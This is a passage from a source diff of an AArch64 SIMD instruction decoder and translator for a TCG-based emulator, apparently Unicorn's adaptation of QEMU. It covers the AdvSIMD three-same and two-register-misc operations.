+ unallocated_encoding(s); + return; + } + break; + } + + if (!fp_access_check(s)) { + return; + } + + if (size == 3) { + assert(is_q); + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + handle_3same_64(s, opcode, u, tcg_res, tcg_op1, tcg_op2); + + write_vec_element(s, tcg_res, rd, pass, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + } else { + for (pass = 0; pass < (is_q ? 
4 : 2); pass++) { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + NeonGenTwoOpFn *genfn = NULL; + NeonGenTwoOpEnvFn *genenvfn = NULL; + + read_vec_element_i32(s, tcg_op1, rn, pass, MO_32); + read_vec_element_i32(s, tcg_op2, rm, pass, MO_32); + + switch (opcode) { + case 0x0: /* SHADD, UHADD */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_hadd_s8, gen_helper_neon_hadd_u8 }, + { gen_helper_neon_hadd_s16, gen_helper_neon_hadd_u16 }, + { gen_helper_neon_hadd_s32, gen_helper_neon_hadd_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x1: /* SQADD, UQADD */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qadd_s8, gen_helper_neon_qadd_u8 }, + { gen_helper_neon_qadd_s16, gen_helper_neon_qadd_u16 }, + { gen_helper_neon_qadd_s32, gen_helper_neon_qadd_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x2: /* SRHADD, URHADD */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_rhadd_s8, gen_helper_neon_rhadd_u8 }, + { gen_helper_neon_rhadd_s16, gen_helper_neon_rhadd_u16 }, + { gen_helper_neon_rhadd_s32, gen_helper_neon_rhadd_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x4: /* SHSUB, UHSUB */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_hsub_s8, gen_helper_neon_hsub_u8 }, + { gen_helper_neon_hsub_s16, gen_helper_neon_hsub_u16 }, + { gen_helper_neon_hsub_s32, gen_helper_neon_hsub_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x5: /* SQSUB, UQSUB */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qsub_s8, gen_helper_neon_qsub_u8 }, + { gen_helper_neon_qsub_s16, gen_helper_neon_qsub_u16 }, + { gen_helper_neon_qsub_s32, gen_helper_neon_qsub_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0x6: /* CMGT, CMHI */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_cgt_s8, gen_helper_neon_cgt_u8 }, + { 
gen_helper_neon_cgt_s16, gen_helper_neon_cgt_u16 }, + { gen_helper_neon_cgt_s32, gen_helper_neon_cgt_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x7: /* CMGE, CMHS */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_cge_s8, gen_helper_neon_cge_u8 }, + { gen_helper_neon_cge_s16, gen_helper_neon_cge_u16 }, + { gen_helper_neon_cge_s32, gen_helper_neon_cge_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x8: /* SSHL, USHL */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_shl_s8, gen_helper_neon_shl_u8 }, + { gen_helper_neon_shl_s16, gen_helper_neon_shl_u16 }, + { gen_helper_neon_shl_s32, gen_helper_neon_shl_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x9: /* SQSHL, UQSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qshl_s8, gen_helper_neon_qshl_u8 }, + { gen_helper_neon_qshl_s16, gen_helper_neon_qshl_u16 }, + { gen_helper_neon_qshl_s32, gen_helper_neon_qshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0xa: /* SRSHL, URSHL */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_rshl_s8, gen_helper_neon_rshl_u8 }, + { gen_helper_neon_rshl_s16, gen_helper_neon_rshl_u16 }, + { gen_helper_neon_rshl_s32, gen_helper_neon_rshl_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0xb: /* SQRSHL, UQRSHL */ + { + static NeonGenTwoOpEnvFn * const fns[3][2] = { + { gen_helper_neon_qrshl_s8, gen_helper_neon_qrshl_u8 }, + { gen_helper_neon_qrshl_s16, gen_helper_neon_qrshl_u16 }, + { gen_helper_neon_qrshl_s32, gen_helper_neon_qrshl_u32 }, + }; + genenvfn = fns[size][u]; + break; + } + case 0xc: /* SMAX, UMAX */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_max_s8, gen_helper_neon_max_u8 }, + { gen_helper_neon_max_s16, gen_helper_neon_max_u16 }, + { gen_max_s32, gen_max_u32 }, + }; + genfn = fns[size][u]; + break; + } + + case 0xd: /* SMIN, UMIN */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { 
gen_helper_neon_min_s8, gen_helper_neon_min_u8 }, + { gen_helper_neon_min_s16, gen_helper_neon_min_u16 }, + { gen_min_s32, gen_min_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0xe: /* SABD, UABD */ + case 0xf: /* SABA, UABA */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_abd_s8, gen_helper_neon_abd_u8 }, + { gen_helper_neon_abd_s16, gen_helper_neon_abd_u16 }, + { gen_helper_neon_abd_s32, gen_helper_neon_abd_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x10: /* ADD, SUB */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_add_u8, gen_helper_neon_sub_u8 }, + { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, + { tcg_gen_add_i32, tcg_gen_sub_i32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x11: /* CMTST, CMEQ */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_tst_u8, gen_helper_neon_ceq_u8 }, + { gen_helper_neon_tst_u16, gen_helper_neon_ceq_u16 }, + { gen_helper_neon_tst_u32, gen_helper_neon_ceq_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x13: /* MUL, PMUL */ + if (u) { + /* PMUL */ + assert(size == 0); + genfn = gen_helper_neon_mul_p8; + break; + } + /* fall through : MUL */ + case 0x12: /* MLA, MLS */ + { + static NeonGenTwoOpFn * const fns[3] = { + gen_helper_neon_mul_u8, + gen_helper_neon_mul_u16, + tcg_gen_mul_i32, + }; + genfn = fns[size]; + break; + } + case 0x16: /* SQDMULH, SQRDMULH */ + { + static NeonGenTwoOpEnvFn * const fns[2][2] = { + { gen_helper_neon_qdmulh_s16, gen_helper_neon_qrdmulh_s16 }, + { gen_helper_neon_qdmulh_s32, gen_helper_neon_qrdmulh_s32 }, + }; + assert(size == 1 || size == 2); + genenvfn = fns[size - 1][u]; + break; + } + default: + g_assert_not_reached(); + } + + if (genenvfn) { + genenvfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op1, tcg_op2); + } else { + genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + } + + if (opcode == 0xf || opcode == 0x12) { + /* SABA, UABA, MLA, MLS: accumulating ops */ + static NeonGenTwoOpFn * const 
fns[3][2] = { + { gen_helper_neon_add_u8, gen_helper_neon_sub_u8 }, + { gen_helper_neon_add_u16, gen_helper_neon_sub_u16 }, + { tcg_gen_add_i32, tcg_gen_sub_i32 }, + }; + bool is_sub = (opcode == 0x12 && u); /* MLS */ + + genfn = fns[size][is_sub]; + read_vec_element_i32(s, tcg_op1, rd, pass, MO_32); + genfn(tcg_ctx, tcg_res, tcg_op1, tcg_res); + } + + write_vec_element_i32(s, tcg_res, rd, pass, MO_32); + + tcg_temp_free_i32(tcg_ctx, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + } + } + + if (!is_q) { + clear_vec_high(s, rd); + } +} + +/* C3.6.16 AdvSIMD three same + * 31 30 29 28 24 23 22 21 20 16 15 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+--------+---+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 1 | Rn | Rd | + * +---+---+---+-----------+------+---+------+--------+---+------+------+ + */ +static void disas_simd_three_reg_same(DisasContext *s, uint32_t insn) +{ + int opcode = extract32(insn, 11, 5); + + switch (opcode) { + case 0x3: /* logic ops */ + disas_simd_3same_logic(s, insn); + break; + case 0x17: /* ADDP */ + case 0x14: /* SMAXP, UMAXP */ + case 0x15: /* SMINP, UMINP */ + { + /* Pairwise operations */ + int is_q = extract32(insn, 30, 1); + int u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + if (opcode == 0x17) { + if (u || (size == 3 && !is_q)) { + unallocated_encoding(s); + return; + } + } else { + if (size == 3) { + unallocated_encoding(s); + return; + } + } + handle_simd_3same_pair(s, is_q, u, opcode, size, rn, rm, rd); + break; + } + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: + case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: case 0x26: case 0x27: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: case 0x2e: case 0x2f: + case 0x30: case 0x31: + /* floating point ops, 
sz[1] and U are part of opcode */ + disas_simd_3same_float(s, insn); + break; + default: + disas_simd_3same_int(s, insn); + break; + } +} + +static void handle_2misc_widening(DisasContext *s, int opcode, bool is_q, + int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Handle 2-reg-misc ops which are widening (so each size element + * in the source becomes a 2*size element in the destination. + * The only instruction like this is FCVTL. + */ + int pass; + + if (size == 3) { + /* 32 -> 64 bit fp conversion */ + TCGv_i64 tcg_res[2]; + int srcelt = is_q ? 2 : 0; + + for (pass = 0; pass < 2; pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, srcelt + pass, MO_32); + gen_helper_vfp_fcvtds(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } + } else { + /* 16 -> 32 bit fp conversion */ + int srcelt = is_q ? 4 : 0; + TCGv_i32 tcg_res[4]; + + for (pass = 0; pass < 4; pass++) { + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_res[pass], rn, srcelt + pass, MO_16); + gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_res[pass], tcg_res[pass], + tcg_ctx->cpu_env); + } + for (pass = 0; pass < 4; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + } +} + +static void handle_rev(DisasContext *s, int opcode, bool u, + bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op = (opcode << 1) | u; + int opsz = op + size; + int grp_size = 3 - opsz; + int dsize = is_q ? 
128 : 64; + int i; + + if (opsz >= 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (size == 0) { + /* Special case bytes, use bswap op on each group of elements */ + int groups = dsize / (8 << grp_size); + + for (i = 0; i < groups; i++) { + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_tmp, rn, i, grp_size); + switch (grp_size) { + case MO_16: + tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); + break; + case MO_32: + tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); + break; + case MO_64: + tcg_gen_bswap64_i64(tcg_ctx, tcg_tmp, tcg_tmp); + break; + default: + g_assert_not_reached(); + } + write_vec_element(s, tcg_tmp, rd, i, grp_size); + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } + if (!is_q) { + clear_vec_high(s, rd); + } + } else { + int revmask = (1 << grp_size) - 1; + int esize = 8 << size; + int elements = dsize / esize; + TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_rd = tcg_const_i64(tcg_ctx, 0); + TCGv_i64 tcg_rd_hi = tcg_const_i64(tcg_ctx, 0); + + for (i = 0; i < elements; i++) { + int e_rev = (i & 0xf) ^ revmask; + int off = e_rev * esize; + read_vec_element(s, tcg_rn, rn, i, size); + if (off >= 64) { + tcg_gen_deposit_i64(tcg_ctx, tcg_rd_hi, tcg_rd_hi, + tcg_rn, off - 64, esize); + } else { + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, off, esize); + } + } + write_vec_element(s, tcg_rd, rd, 0, MO_64); + write_vec_element(s, tcg_rd_hi, rd, 1, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_rd_hi); + tcg_temp_free_i64(tcg_ctx, tcg_rd); + tcg_temp_free_i64(tcg_ctx, tcg_rn); + } +} + +static void handle_2misc_pairwise(DisasContext *s, int opcode, bool u, + bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Implement the pairwise operations from 2-misc: + * SADDLP, UADDLP, SADALP, UADALP. + * These all add pairs of elements in the input to produce a + * double-width result element in the output (possibly accumulating). 
+ */ + bool accum = (opcode == 0x6); + int maxpass = is_q ? 2 : 1; + int pass; + TCGv_i64 tcg_res[2]; + + if (size == 2) { + /* 32 + 32 -> 64 op */ + TCGMemOp memop = size + (u ? 0 : MO_SIGN); + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, pass * 2, memop); + read_vec_element(s, tcg_op2, rn, pass * 2 + 1, memop); + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + if (accum) { + read_vec_element(s, tcg_op1, rd, pass, MO_64); + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + } else { + for (pass = 0; pass < maxpass; pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + NeonGenOneOpFn *genfn; + static NeonGenOneOpFn * const fns[2][2] = { + { gen_helper_neon_addlp_s8, gen_helper_neon_addlp_u8 }, + { gen_helper_neon_addlp_s16, gen_helper_neon_addlp_u16 }, + }; + + genfn = fns[size][u]; + + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + genfn(tcg_ctx, tcg_res[pass], tcg_op); + + if (accum) { + read_vec_element(s, tcg_op, rd, pass, MO_64); + if (size == 0) { + gen_helper_neon_addl_u16(tcg_ctx, tcg_res[pass], + tcg_res[pass], tcg_op); + } else { + gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], + tcg_res[pass], tcg_op); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + } + if (!is_q) { + tcg_res[1] = tcg_const_i64(tcg_ctx, 0); + } + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } +} + +static void handle_shll(DisasContext *s, bool is_q, int size, int rn, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* Implement SHLL and SHLL2 */ + int pass; + int part = is_q ? 
2 : 0; + TCGv_i64 tcg_res[2]; + + for (pass = 0; pass < 2; pass++) { + static NeonGenWidenFn * const widenfns[3] = { + gen_helper_neon_widen_u8, + gen_helper_neon_widen_u16, + tcg_gen_extu_i32_i64, + }; + NeonGenWidenFn *widenfn = widenfns[size]; + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + + read_vec_element_i32(s, tcg_op, rn, part + pass, MO_32); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + widenfn(tcg_ctx, tcg_res[pass], tcg_op); + tcg_gen_shli_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], 8 << size); + + tcg_temp_free_i32(tcg_ctx, tcg_op); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } +} + +/* C3.6.17 AdvSIMD two reg misc + * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | + * +---+---+---+-----------+------+-----------+--------+-----+------+------+ + */ +static void disas_simd_two_reg_misc(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 5); + bool u = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + bool need_fpstatus = false; + bool need_rmode = false; + int rmode = -1; + TCGv_i32 tcg_rmode; + TCGv_ptr tcg_fpstatus; + + switch (opcode) { + case 0x0: /* REV64, REV32 */ + case 0x1: /* REV16 */ + handle_rev(s, opcode, u, is_q, size, rn, rd); + return; + case 0x5: /* CNT, NOT, RBIT */ + if (u && size == 0) { + /* NOT: adjust size so we can use the 64-bits-at-a-time loop. 
*/ + size = 3; + break; + } else if (u && size == 1) { + /* RBIT */ + break; + } else if (!u && size == 0) { + /* CNT */ + break; + } + unallocated_encoding(s); + return; + case 0x12: /* XTN, XTN2, SQXTUN, SQXTUN2 */ + case 0x14: /* SQXTN, SQXTN2, UQXTN, UQXTN2 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + + handle_2misc_narrow(s, false, opcode, u, is_q, size, rn, rd); + return; + case 0x4: /* CLS, CLZ */ + if (size == 3) { + unallocated_encoding(s); + return; + } + break; + case 0x2: /* SADDLP, UADDLP */ + case 0x6: /* SADALP, UADALP */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_pairwise(s, opcode, u, is_q, size, rn, rd); + return; + case 0x13: /* SHLL, SHLL2 */ + if (u == 0 || size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_shll(s, is_q, size, rn, rd); + return; + case 0xa: /* CMLT */ + if (u == 1) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x8: /* CMGT, CMGE */ + case 0x9: /* CMEQ, CMLE */ + case 0xb: /* ABS, NEG */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x3: /* SUQADD, USQADD */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_satacc(s, false, u, is_q, size, rn, rd); + return; + case 0x7: /* SQABS, SQNEG */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x0c: case 0x0d: case 0x0e: case 0x0f: + case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: + case 0x1f: + { + /* Floating point: U, size[1] and opcode indicate operation; + * size[0] indicates single or double precision. + */ + int is_double = extract32(size, 0, 1); + opcode |= (extract32(size, 1, 1) << 5) | (u << 6); + size = is_double ? 
3 : 2; + switch (opcode) { + case 0x2f: /* FABS */ + case 0x6f: /* FNEG */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x1d: /* SCVTF */ + case 0x5d: /* UCVTF */ + { + bool is_signed = (opcode == 0x1d) ? true : false; + int elements = is_double ? 2 : is_q ? 4 : 2; + if (is_double && !is_q) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_simd_intfp_conv(s, rd, rn, elements, is_signed, 0, size); + return; + } + case 0x2c: /* FCMGT (zero) */ + case 0x2d: /* FCMEQ (zero) */ + case 0x2e: /* FCMLT (zero) */ + case 0x6c: /* FCMGE (zero) */ + case 0x6d: /* FCMLE (zero) */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + handle_2misc_fcmp_zero(s, opcode, false, u, is_q, size, rn, rd); + return; + case 0x7f: /* FSQRT */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + need_fpstatus = true; + need_rmode = true; + rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x5c: /* FCVTAU */ + case 0x1c: /* FCVTAS */ + need_fpstatus = true; + need_rmode = true; + rmode = FPROUNDING_TIEAWAY; + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x3c: /* URECPE */ + if (size == 3) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x3d: /* FRECPE */ + case 0x7d: /* FRSQRTE */ + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_2misc_reciprocal(s, opcode, false, u, is_q, size, rn, rd); + return; + case 0x56: /* FCVTXN, FCVTXN2 */ + if (size == 2) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x16: /* 
FCVTN, FCVTN2 */ + /* handle_2misc_narrow does a 2*size -> size operation, but these + * instructions encode the source size rather than dest size. + */ + if (!fp_access_check(s)) { + return; + } + handle_2misc_narrow(s, false, opcode, 0, is_q, size - 1, rn, rd); + return; + case 0x17: /* FCVTL, FCVTL2 */ + if (!fp_access_check(s)) { + return; + } + handle_2misc_widening(s, opcode, is_q, size, rn, rd); + return; + case 0x18: /* FRINTN */ + case 0x19: /* FRINTM */ + case 0x38: /* FRINTP */ + case 0x39: /* FRINTZ */ + need_rmode = true; + rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); + /* fall through */ + case 0x59: /* FRINTX */ + case 0x79: /* FRINTI */ + need_fpstatus = true; + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x58: /* FRINTA */ + need_rmode = true; + rmode = FPROUNDING_TIEAWAY; + need_fpstatus = true; + if (size == 3 && !is_q) { + unallocated_encoding(s); + return; + } + break; + case 0x7c: /* URSQRTE */ + if (size == 3) { + unallocated_encoding(s); + return; + } + need_fpstatus = true; + break; + default: + unallocated_encoding(s); + return; + } + break; + } + default: + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (need_fpstatus) { + tcg_fpstatus = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_PTR(tcg_fpstatus); + } + if (need_rmode) { + tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); + gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_ctx->cpu_env); + } else { + TCGV_UNUSED_I32(tcg_rmode); + } + + if (size == 3) { + /* All 64-bit element operations can be shared with scalar 2misc */ + int pass; + + for (pass = 0; pass < (is_q ? 
2 : 1); pass++) { + TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op, rn, pass, MO_64); + + handle_2misc_64(s, opcode, u, tcg_res, tcg_op, + tcg_rmode, tcg_fpstatus); + + write_vec_element(s, tcg_res, rd, pass, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_res); + tcg_temp_free_i64(tcg_ctx, tcg_op); + } + } else { + int pass; + + for (pass = 0; pass < (is_q ? 4 : 2); pass++) { + TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); + TCGCond cond; + + read_vec_element_i32(s, tcg_op, rn, pass, MO_32); + + if (size == 2) { + /* Special cases for 32 bit elements */ + switch (opcode) { + case 0xa: /* CMLT */ + /* 32 bit integer comparison against zero, result is + * test ? (2^32 - 1) : 0. We implement via setcond(test) + * and inverting. + */ + cond = TCG_COND_LT; + do_cmop: + tcg_gen_setcondi_i32(tcg_ctx, cond, tcg_res, tcg_op, 0); + tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_res); + break; + case 0x8: /* CMGT, CMGE */ + cond = u ? TCG_COND_GE : TCG_COND_GT; + goto do_cmop; + case 0x9: /* CMEQ, CMLE */ + cond = u ? 
TCG_COND_LE : TCG_COND_EQ; + goto do_cmop; + case 0x4: /* CLS */ + if (u) { + gen_helper_clz32(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_cls32(tcg_ctx, tcg_res, tcg_op); + } + break; + case 0x7: /* SQABS, SQNEG */ + if (u) { + gen_helper_neon_qneg_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); + } else { + gen_helper_neon_qabs_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); + } + break; + case 0xb: /* ABS, NEG */ + if (u) { + tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_op); + } else { + TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); + tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_op); + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GT, tcg_res, tcg_op, + tcg_zero, tcg_op, tcg_res); + tcg_temp_free_i32(tcg_ctx, tcg_zero); + } + break; + case 0x2f: /* FABS */ + gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); + break; + case 0x6f: /* FNEG */ + gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); + break; + case 0x7f: /* FSQRT */ + gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); + break; + case 0x1a: /* FCVTNS */ + case 0x1b: /* FCVTMS */ + case 0x1c: /* FCVTAS */ + case 0x3a: /* FCVTPS */ + case 0x3b: /* FCVTZS */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_op, + tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x5a: /* FCVTNU */ + case 0x5b: /* FCVTMU */ + case 0x5c: /* FCVTAU */ + case 0x7a: /* FCVTPU */ + case 0x7b: /* FCVTZU */ + { + TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); + gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_op, + tcg_shift, tcg_fpstatus); + tcg_temp_free_i32(tcg_ctx, tcg_shift); + break; + } + case 0x18: /* FRINTN */ + case 0x19: /* FRINTM */ + case 0x38: /* FRINTP */ + case 0x39: /* FRINTZ */ + case 0x58: /* FRINTA */ + case 0x79: /* FRINTI */ + gen_helper_rints(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); + break; + case 0x59: /* FRINTX */ + gen_helper_rints_exact(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); + break; + case 0x7c: /* URSQRTE */ + 
gen_helper_rsqrte_u32(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); + break; + default: + g_assert_not_reached(); + } + } else { + /* Use helpers for 8 and 16 bit elements */ + switch (opcode) { + case 0x5: /* CNT, RBIT */ + /* For these two insns size is part of the opcode specifier + * (handled earlier); they always operate on byte elements. + */ + if (u) { + gen_helper_neon_rbit_u8(tcg_ctx, tcg_res, tcg_op); + } else { + gen_helper_neon_cnt_u8(tcg_ctx, tcg_res, tcg_op); + } + break; + case 0x7: /* SQABS, SQNEG */ + { + NeonGenOneOpEnvFn *genfn; + static NeonGenOneOpEnvFn * const fns[2][2] = { + { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, + { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, + }; + genfn = fns[size][u]; + genfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); + break; + } + case 0x8: /* CMGT, CMGE */ + case 0x9: /* CMEQ, CMLE */ + case 0xa: /* CMLT */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_cgt_s8, gen_helper_neon_cgt_s16 }, + { 